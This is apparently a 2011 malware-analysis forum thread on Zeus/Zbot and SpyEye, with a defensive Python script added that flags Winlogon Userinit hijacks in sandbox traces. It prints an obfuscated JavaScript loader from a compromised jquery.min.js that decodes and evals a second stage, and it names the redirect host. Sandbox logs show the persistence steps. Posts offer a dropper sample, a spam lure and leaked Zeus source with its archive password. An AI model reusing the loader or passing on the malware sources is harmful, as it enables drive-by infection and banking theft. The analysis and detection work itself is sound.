Win32/Zeus (alias Zbot)

Forum for analysis and discussion about malware.
rossetoecioccolato
Posts: 29
Joined: Sat Apr 10, 2010 2:09 pm

Re: W32/Zbot

Post by rossetoecioccolato » Tue Feb 01, 2011 6:39 pm

> I've found when using certain types of wireless via host and VM, this can also be a bad thing. <

I suppose that is only something that you get if somebody really likes you. :-| Would be interested though if there is anything that you can share. Did you look for rooted firmware in the SRAM of the wireless adapter?

PX5
Posts: 144
Joined: Thu Apr 29, 2010 1:14 am

Re: W32/Zbot

Post by PX5 » Tue Feb 01, 2011 8:12 pm

Actually... I haven't a clue, but any TDSS/TDL DNS changer would do the trick I assume. The host was XP SP3 and I was using VBox, but it's been at least a year ago when it happened; DNS settings for both host and guest were tainted.

That's about it. I did feel special for the moment, as in Short Bus Special, but the moment passed quickly. ;)
Arrogance led me to my Ignorance

rossetoecioccolato
Posts: 29
Joined: Sat Apr 10, 2010 2:09 pm

Re: W32/Zbot

Post by rossetoecioccolato » Wed Feb 02, 2011 11:51 pm

> DNS Settings for both host and guest were tainted.<

Sorry, I misread your previous post. You were referring to a wireless router and I was thinking of a certain wireless network adapter. Virtually any hardware that is shared between the guest and host can lead to migration from guest to host partition. Thanks for sharing your experience.

markusg
Posts: 734
Joined: Mon Mar 15, 2010 2:53 pm

Re: W32/Zbot

Post by markusg » Sat Feb 05, 2011 6:19 pm

zbot

markusg
Posts: 734
Joined: Mon Mar 15, 2010 2:53 pm

Re: W32/Zbot

Post by markusg » Thu Feb 10, 2011 1:56 pm


gjf
Posts: 198
Joined: Mon Mar 15, 2010 10:23 am
Location: Where I lay my head is home

Re: W32/Zbot

Post by gjf » Fri Feb 18, 2011 12:00 am

Some new story. Some Russian sites present to the user some JS in jquery.min.js.
This code redirects to the host hxxp://bul0va.com/index.php?tp=f67f75493a6182fa with HTML which uses a Java applet with a unique "pid" parameter to perform decoding in the following part of the embedded JS:

Code:

var vrq = null;
// Walk the first stylesheet and pull the payload out of a data: URL in a CSS rule;
// vrq ends up holding whatever follows the comma in url("data:...,<payload>").
var mgi = document.styleSheets[0].rules || document.styleSheets[0].cssRules;
for (var dcwes = 0; dcwes < mgi.length; dcwes++) {
  var ztffs = mgi.item ? mgi.item(dcwes) : mgi[dcwes];
  roz = (ztffs.cssText) ? ztffs.cssText : ztffs.style.cssText;
  vrq = roz.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];
};
var s = "";
// g is the global object (window); the first two characters of the payload are
// spliced into "e" + ?? + "l", so dtvu resolves to a global function by name
// (for the call below to work the payload must start with "va", i.e. eval).
var g = function(){ return this; }();
dtvu = g["e" + vrq.substr(0, 2) + "l"];
// The first textarea on the page holds a comma-separated list of numbers.
clrn = document.getElementsByTagName("textarea")[9-9].value.split(",");
// The rest of the payload is evaluated to obtain the per-number decoding function.
hqon = dtvu(vrq.substr(2));
// Each number is subtracted from 9501 and mapped to a string fragment;
// the concatenated result is the second-stage script, which is then evaluated.
for (var i = 0; i < clrn.length; i++) {
  bzmwy = 9501 - 1*clrn[i];
  s += hqon(bzmwy);
}
dtvu(s);

where "textarea" is some data in the JS.

After that, depending on OS version, *nix systems are forwarded to Google and Windows systems receive a dropper in %temp% which starts after that.

This file has low detection and is packed with UPX:

Code:

UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]

There is another protector under UPX:

Code:

AHTeam EP Protector 0.3 (fake PCGuard 4.03-4.15) -> FEUERRADER [Overlay] *

but the version is fake; the protector is modified slightly.

The file is typical Zbot, maybe new, maybe old but repacked:

Code:

Executing: d:\mxmt-upx.exe
...
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [d:\mxmt-upx.exe]
CreateMutex(_AVIRA_21099) [d:\mxmt-upx.exe]
...
RegCreateKeyEx(HKLM\software\microsoft\windows nt\currentversion\winlogon,(null)) [d:\mxmt-upx.exe]
RegSetValueEx(HKLM\software\microsoft\windows nt\currentversion\winlogon\userinit, REG_SZ: C:\WINDOWS\System32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) [d:\mxmt-upx.exe]
DeleteFile(C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Copy(D:\mxmt-UPX.exe->C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Anubis logs, CWSandbox logs.

Original dropper is attached, the password is infected.
VirusInfo / Defendium / SafeZone Helpers Crew
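The sandbox trace above shows the classic Zbot persistence: the Winlogon Userinit value is rewritten so that sdra64.exe is launched alongside the real userinit.exe at every logon. The following is an added example, not code from the post or from any of the sandboxes named in it, that parses API-trace lines in the same "API(args) [process]" shape, splits the Userinit value on commas, and reports every entry that is not the expected system userinit.exe, cross-checking it against files the sample itself dropped. The sample log is constructed from the lines quoted above; the expected default path (C:\WINDOWS\System32\userinit.exe) is an assumption for an English XP install.

```python
import re
from dataclasses import dataclass

# Constructed sample, modelled on the sandbox trace quoted in the post above.
SAMPLE_LOG = r"""
Executing: d:\mxmt-upx.exe
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [d:\mxmt-upx.exe]
CreateMutex(_AVIRA_21099) [d:\mxmt-upx.exe]
RegCreateKeyEx(HKLM\software\microsoft\windows nt\currentversion\winlogon,(null)) [d:\mxmt-upx.exe]
RegSetValueEx(HKLM\software\microsoft\windows nt\currentversion\winlogon\userinit, REG_SZ: C:\WINDOWS\System32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) [d:\mxmt-upx.exe]
DeleteFile(C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Copy(D:\mxmt-UPX.exe->C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
"""

# Assumed clean value for an English XP install: the system userinit.exe alone
# (a trailing comma is normal and must not be treated as an extra entry).
DEFAULT_USERINIT = r"C:\WINDOWS\System32\userinit.exe"
USERINIT_VALUE = r"hklm\software\microsoft\windows nt\currentversion\winlogon\userinit"

# One trace line: API name, raw argument text, and the process that made the call.
LINE_RE = re.compile(r"^(?P<api>\w+)\((?P<args>.*)\)\s+\[(?P<proc>[^\]]+)\]$")


@dataclass
class Call:
    api: str
    args: str
    proc: str


def parse_log(text):
    """Turn trace text into Call records; lines that are not API calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            calls.append(Call(m["api"], m["args"], m["proc"]))
    return calls


def split_userinit(value):
    """Split a REG_SZ Userinit value into its executables, dropping empty entries."""
    return [p.strip() for p in value.split(",") if p.strip()]


def extra_userinit_entries(value, default=DEFAULT_USERINIT):
    """Every entry that is not the expected userinit.exe (path compared case-insensitively)."""
    return [p for p in split_userinit(value) if p.lower() != default.lower()]


def find_userinit_hijack(calls):
    """Return (value_written, extra_entries) for a Userinit write, or None if there is none."""
    for c in calls:
        if c.api != "RegSetValueEx":
            continue
        name, sep, data = c.args.partition(", REG_SZ: ")
        if sep and name.lower() == USERINIT_VALUE:
            return data, extra_userinit_entries(data)
    return None


def triage(text):
    """Summarise the persistence-relevant events of one trace."""
    calls = parse_log(text)
    hijack = find_userinit_hijack(calls)
    dropped = [c.args.split("->", 1)[1] for c in calls if c.api == "Copy" and "->" in c.args]
    mutexes = [c.args for c in calls if c.api == "CreateMutex"]
    extra = hijack[1] if hijack else []
    # Persistence is confirmed when an extra Userinit entry is a file the sample itself wrote.
    confirmed = [p for p in extra if p.lower() in {d.lower() for d in dropped}]
    return {
        "mutexes": mutexes,
        "userinit_extra": extra,
        "dropped": dropped,
        "confirmed_persistence": confirmed,
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_LOG).items():
        print(f"{key}: {val}")
```

The same split-and-compare check can be run against a live registry export (the Userinit value under HKLM\software\microsoft\windows nt\currentversion\winlogon) rather than a sandbox trace; anything after the first comma that is not the system userinit.exe deserves a look.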

gjf
Posts: 198
Joined: Mon Mar 15, 2010 10:23 am
Location: Where I lay my head is home

Zeus Sources

Post by gjf » Wed May 11, 2011 9:12 pm

Just because these sources have leaked from closed mailing lists to the public, I can give a link here too :)
Sources are as old as 2.0.8.9.
For everybody who is interested.
VirusInfo / Defendium / SafeZone Helpers Crew

Fabian Wosar
Posts: 88
Joined: Thu Aug 26, 2010 8:23 am
Location: Germany
Contact:

Re: Zeus Sources

Post by Fabian Wosar » Wed May 11, 2011 9:39 pm

The password is "zeus" by the way ;).
Best regards,

Fabian Wosar [Development]
Emsisoft Team - www.emsisoft.com

Flamef
Posts: 65
Joined: Thu Jul 07, 2011 6:06 pm

Amy's death and SpyEye, already exploited?

Post by Flamef » Sat Jul 30, 2011 12:31 pm

So, I was browsing a forum and suddenly a message arrived in my box. Subject: "Amy Winehouse moments before death".
A file was attached; it was password protected. It's a new trick, I guess, since I saw a warning: "The file update socking video footage realleased of Amy Winehouse moments before death.zip is password protected and cannot be scanned for viruses."
Some pictures of the interesting infected file:

Virus total scan > http://www.virustotal.com/file-scan/rep ... 1312027915
4/43

McAfee 5.400.0.1158 2011.07.30 PWS-Spyeye.bx

I don't know if this is the right place to attach the sample; if you need the sample to analyze it etc., hit me a PM or post here.

EP_X0FF
Global Moderator
Posts: 4872
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Amy's death and SpyEye, already exploited?

Post by EP_X0FF » Sat Jul 30, 2011 1:06 pm

Please attach it here in password protected archive.
Ring0 - the source of inspiration
